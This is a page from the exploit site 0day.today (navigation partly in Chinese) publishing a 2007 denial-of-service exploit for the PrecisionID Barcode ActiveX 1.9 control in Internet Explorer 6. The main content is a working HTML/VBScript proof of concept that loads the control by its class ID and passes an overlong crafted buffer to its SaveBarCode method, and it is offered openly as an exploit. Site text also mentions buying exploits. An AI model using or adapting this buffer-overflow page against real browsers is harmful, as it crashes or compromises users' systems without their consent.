0day.today - 世界最大的漏洞利用数据库。
![](/img/logo_green.jpg)
- 我们唯一的域名:http://0day.today
- 我们大多数的材料都完全免费
- 如果你想购买漏洞利用 / 获取V.I.P.权限 或者使用其他付费服务,
你需要购买或者赢取金币金币
本站管理员使用官方账号。请谨防诈骗!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
你可以由此方式联系我们:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PrecisionID Barcode ActiveX 1.9 Remote Denial of Service Exploit
================================================================ PrecisionID Barcode ActiveX 1.9 Remote Denial of Service Exploit ================================================================ <pre> <span style="font: 14pt Courier New;"><p align="center"><b>2007/05/16</b></p></span> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">--------------------------------------------------------------------------------------- <b>IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Denail of Service</b> url: http://www.precisionid.com/ author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6 all software that use this ocx are vulnerable to these exploits. If you try this exploit with IE 7, it just stops to answer --------------------------------------------------------------------------------------- <object classid='clsid:731766D0-8541-11DB-99C1-0050C2490048' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language='vbscript'> Sub tryMe buff = String(348,"A") get_ESI = "aaaa" buff1 = String(665,"B") test.SaveBarCode buff + get_ESI + buff1 End Sub </script> </span></span> </code></pre> # 0day.today [2024-06-28] #